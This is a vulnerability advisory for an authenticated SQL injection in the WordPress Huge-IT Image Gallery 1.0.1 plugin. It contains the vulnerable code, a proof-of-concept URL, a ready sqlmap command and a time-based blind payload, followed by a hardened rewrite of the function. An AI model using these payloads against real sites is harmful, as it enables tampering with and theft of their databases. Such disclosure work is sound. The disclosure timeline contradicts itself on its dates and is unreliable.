######################
# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
#   Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :

function editgallery($id) {
    global $wpdb;
    if(isset($_GET["removeslide"])){
        if($_GET["removeslide"] != ''){
            // $_GET["removeslide"] is concatenated straight into the DELETE statement
            $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");
        }
    }

######################
# PoC Exploit:
http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2

# Exploit Code via sqlmap:
sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
    -p removeslide --dbms=mysql --level 3

[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
...
...
...
---
Place: GET
Parameter: removeslide
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---

# PoC Video:
https://www.youtube.com/watch?v=gAmb0_o3ZUc

######################
# Vulnerability Disclosure Timeline:
2014-08-25: Discovered vulnerability
2014-08-26: Vendor Notification (Web Customers Service Form)
2014-08-26: No Response/Feedback
2014-08-01: Plugin version 1.0.1 released without fix
2014-08-02: Public Disclosure
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################
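For comparison with the vulnerable editgallery() excerpt above, here is a hardened rewrite of the same deletion branch. This is an added example and not the plugin's or the author's code; the function and table names come from the advisory, while the nonce action name and the required capability are assumptions.

```php
<?php
// Added example (not the plugin's own code): hardened form of the
// editgallery() deletion branch shown in the advisory.
function editgallery_hardened( $id ) {
    global $wpdb;

    if ( ! isset( $_GET['removeslide'] ) || $_GET['removeslide'] === '' ) {
        return false;
    }

    // Deletion is a privileged action: require a capability and a nonce so
    // that a logged-in user cannot be tricked into issuing the request.
    // 'manage_options' and the nonce action name are assumptions.
    if ( ! current_user_can( 'manage_options' ) ) {
        return false;
    }
    check_admin_referer( 'huge_it_remove_slide' );

    // The id column is numeric: accept only a string of digits, so a value
    // such as "1 and 1=2" is rejected outright instead of being truncated.
    $raw = wp_unslash( $_GET['removeslide'] );
    if ( ! ctype_digit( (string) $raw ) ) {
        return false;
    }
    $slide_id = (int) $raw;
    if ( $slide_id <= 0 ) {
        return false;
    }

    // $wpdb->prepare() binds the value with %d instead of concatenating
    // request input into the statement, which removes the injection point.
    $table = $wpdb->prefix . 'huge_itgallery_images';
    $sql   = $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $slide_id );

    return $wpdb->query( $sql ) !== false;
}
```

The two defences are independent: prepare() alone stops the SQL injection, while the capability and nonce checks address the fact that the original handler deletes rows for any request reaching the admin page.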